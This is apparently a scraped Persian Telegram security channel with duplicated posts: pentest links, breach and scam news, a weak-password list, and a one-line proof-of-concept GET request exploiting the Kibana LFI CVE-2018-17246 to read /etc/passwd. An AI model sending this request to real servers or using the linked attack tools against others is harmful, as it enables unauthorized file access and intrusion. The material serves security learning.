سرقت هش های NTLM با استفاده از آسیب پذیری موجود در اپلیکیشن وب
https://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html
#web
#pentest
#windows
#responder
@sec_nerd
https://www.mannulinux.org/2018/12/how-to-steal-ntlmv2-hashes-using-file.html
#web
#pentest
#windows
#responder
@sec_nerd
واکنش رئیس پلیس گذرنامه به وجود GPS در گذرنامه
رئیس پلیس مهاجرت و گذرنامه نیروی انتظامی:
🔹اعلام مطلبی مبنی بر اینکه GPS در گذرنامهها نصب شده است، موضوعی غیرتخصصی و خندهدار است.
🔹ایران همانند ۹۰ درصد کشورهای دنیا گذرنامهاش الکترونیکی است و براین اساس تراشهای الکترونیکی در آن نصب شده است.
🔹در روی جلد گذرنامه نیز علامتی شبیه دوربین حک شده است که به صورت شفاف اعلام میکند که گذرنامه الکترونیکی است.
/فارس
#news
#police
#iran
@sec_nerd
رئیس پلیس مهاجرت و گذرنامه نیروی انتظامی:
🔹اعلام مطلبی مبنی بر اینکه GPS در گذرنامهها نصب شده است، موضوعی غیرتخصصی و خندهدار است.
🔹ایران همانند ۹۰ درصد کشورهای دنیا گذرنامهاش الکترونیکی است و براین اساس تراشهای الکترونیکی در آن نصب شده است.
🔹در روی جلد گذرنامه نیز علامتی شبیه دوربین حک شده است که به صورت شفاف اعلام میکند که گذرنامه الکترونیکی است.
/فارس
#news
#police
#iran
@sec_nerd
Elasticsearch Kibana Console LFI CVE-2018-17246
PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
#elasticsearch
#nosql
#exploit
@sec_nerd
PoC:
GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
#elasticsearch
#nosql
#exploit
@sec_nerd
نکاتی در خصوص دایرکتوری های مخفی در وبسایتها برای نفوذگران
https://medium.com/@_bl4de/hidden-directories-and-files-as-a-source-of-sensitive-information-about-web-application-84e5c534e5ad
#web
#pentest
#bugbounty
@sec_nerd
https://medium.com/@_bl4de/hidden-directories-and-files-as-a-source-of-sensitive-information-about-web-application-84e5c534e5ad
#web
#pentest
#bugbounty
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
برخی متدها و کلاسهای Deserialisation در دات نت میتواند با paste کردن منجر به اجرای دستور شود!
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
#windows
#dotnet
#rce
@sec_nerd
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/
#windows
#dotnet
#rce
@sec_nerd
هکرهای چینی ۶۱۴ گیگابایت از اطلاعات سیستم ضدموشکی مخصوص ناو را از ارتش امریکا به سرقت بردند.
به گزارش وال استریت ژورنال این حجم از داده طی چندین حمله و در طول ۱۸ ماه دزدیده شده است. هکرهای چینی موفق شدند پیمانکاران نظامی و زیرمجموعه های آنان را هک کرده و تمام اطلاعات مربوط به موشک ها و نگهداری کشتی و استقرار موشک ها را بدست آورند.
یکی از مهمترین اطلاعاتی که دزدیده شده مربوط به یک سامانه موشکی ضد جنگنده مافوق صوت بوده است.
منبع:
https://www.hackread.com/chinese-hackers-stole-secret-us-navy-data/
#news
#breach
#usa
#china
#army
@sec_nerd
به گزارش وال استریت ژورنال این حجم از داده طی چندین حمله و در طول ۱۸ ماه دزدیده شده است. هکرهای چینی موفق شدند پیمانکاران نظامی و زیرمجموعه های آنان را هک کرده و تمام اطلاعات مربوط به موشک ها و نگهداری کشتی و استقرار موشک ها را بدست آورند.
یکی از مهمترین اطلاعاتی که دزدیده شده مربوط به یک سامانه موشکی ضد جنگنده مافوق صوت بوده است.
منبع:
https://www.hackread.com/chinese-hackers-stole-secret-us-navy-data/
#news
#breach
#usa
#china
#army
@sec_nerd
HackRead
Chinese hackers reportedly stole secret US Navy data
Another blow to the US Navy.
Gerix WiFi Cracker 2018
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
https://github.com/kimocoder/gerix-wifi-cracker
#wifi
#network
#pentest
@sec_nerd
Reading ASP secrets for $17,000
https://samcurry.net/reading-asp-secrets-for-17000/
#web
#pentest
#bugbounty
#writeup
@sec_nerd
https://samcurry.net/reading-asp-secrets-for-17000/
#web
#pentest
#bugbounty
#writeup
@sec_nerd
لیست ضعیفترین پسوردهای سال ۲۰۱۸ هم منتشر شد و جالب اینکه کلمه donald هم در این لیست دیده میشود!
123456
password
123456789
12345678
12345
111111
1234567
sunshine
qwerty
iloveyou
princess
admin
welcome
666666
abc123
football
123123
monkey
654321
!@#$%^&*
charlie
aa123456
donald
password1
qwerty123
منبع:
https://motherboard.vice.com/en_us/article/wj3kem/donald-is-now-one-of-the-top-25-most-commonly-used-passwords
#news
@sec_nerd
123456
password
123456789
12345678
12345
111111
1234567
sunshine
qwerty
iloveyou
princess
admin
welcome
666666
abc123
football
123123
monkey
654321
!@#$%^&*
charlie
aa123456
donald
password1
qwerty123
منبع:
https://motherboard.vice.com/en_us/article/wj3kem/donald-is-now-one-of-the-top-25-most-commonly-used-passwords
#news
@sec_nerd
Vice
'Donald' Is Now One of the Top 25 Most Commonly Used Passwords
Another year of horrendous, terrible, no good passwords is in the books.
تست نفوذ به MSSQL از راه دور با MSDAT
https://github.com/quentinhardy/msdat
#mssql
#windows
#pentest
@sec_nerd
https://github.com/quentinhardy/msdat
#mssql
#windows
#pentest
@sec_nerd
GitHub
GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool
MSDAT: Microsoft SQL Database Attacking Tool. Contribute to quentinhardy/msdat development by creating an account on GitHub.
۹ گام برای استخراج هش های NTLM با استفاده از اسنیف شبکه
https://research.801labs.org/cracking-an-ntlmv2-hash/
#windows
#sniff
#ntlm
#privesc
#pivoting
#lateral_movement
@sec_nerd
https://research.801labs.org/cracking-an-ntlmv2-hash/
#windows
#sniff
#ntlm
#privesc
#pivoting
#lateral_movement
@sec_nerd
رایت آپ کشف باگ blind OOB XXE در PayPal
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study/
#writeup
#web
#xxe
#pentest
#bugbounty
@sec_nerd
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study/
#writeup
#web
#xxe
#pentest
#bugbounty
@sec_nerd
r00thun7
Blind XML External Entities Out-Of-Band Channel Vulnerability : PayPal Case Study
TECHNICAL DETAILS & DESCRIPTION : XML External Entities weakness resides in the application’s XML input parsing capabilities. This attack occurs when XML input containing a reference to a…
بالا بردن سطح دسترسی در وردپرس با استفاده از post type
https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
#web
#pentest
#wordpress
#wp
#php
@sec_nerd
https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
#web
#pentest
#wordpress
#wp
#php
@sec_nerd
اخاذی ایمیلی جدیدی که از مخاطب میخواهد معادل ۴ هزار دلار بیت کوین پرداخت کند وگرنه یک هیتمن (قاتل اجیر شده) به سراغ او خواهد رفت!
این کمپین اسکم در هفته اول ۵۰ هزار دلار درآمد داشته است.
منبع:
https://www.bleepingcomputer.com/news/security/new-extortion-email-threatens-to-send-a-hitman-unless-you-pay-4k/
#news
#scam
#hitman
@sec_nerd
این کمپین اسکم در هفته اول ۵۰ هزار دلار درآمد داشته است.
منبع:
https://www.bleepingcomputer.com/news/security/new-extortion-email-threatens-to-send-a-hitman-unless-you-pay-4k/
#news
#scam
#hitman
@sec_nerd
بانک پسوردلیست
https://github.com/danielmiessler/SecLists/tree/master/Passwords
#crack
#bruteforce
#passlist
@sec_nerd
https://github.com/danielmiessler/SecLists/tree/master/Passwords
#crack
#bruteforce
#passlist
@sec_nerd
GitHub
SecLists/Passwords at master · danielmiessler/SecLists
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, pas...
هکرها با هک کردن شبکه دیپلماتیک اتحادیه اروپا مکاتبات آنها در خصوص نگرانی هایشان در مورد ترامپ، درگیریها با روسیه و چین و نیز خطر احیای فعالیت های هسته ای ایران را بدست آوردند.
این هکرها سه سال در این شبکه حضور داشته اند!
تکنیک مورد استفاده آنها مشابه هکرهای چینی Liberation Army بوده و در آن فایلها از شبکه ی امن به یک سایت در اینترنت ارسال میشد که این سایت متعلق به هکرهاست.
@sec_nerd
منبع:
https://www.nytimes.com/2018/12/18/us/politics/european-diplomats-cables-hacked.html
#news
#europe
#usa
#russia
#iran
#breach
@sec_nerd
این هکرها سه سال در این شبکه حضور داشته اند!
تکنیک مورد استفاده آنها مشابه هکرهای چینی Liberation Army بوده و در آن فایلها از شبکه ی امن به یک سایت در اینترنت ارسال میشد که این سایت متعلق به هکرهاست.
@sec_nerd
منبع:
https://www.nytimes.com/2018/12/18/us/politics/european-diplomats-cables-hacked.html
#news
#europe
#usa
#russia
#iran
#breach
@sec_nerd
NY Times
Hacked European Cables Reveal a World of Anxiety About Trump, Russia and Iran (Published 2018)
The cables quote China’s president calling America a bully, show concerns about Russian nuclear weapons in Crimea and detail the White House walking back President Trump’s words.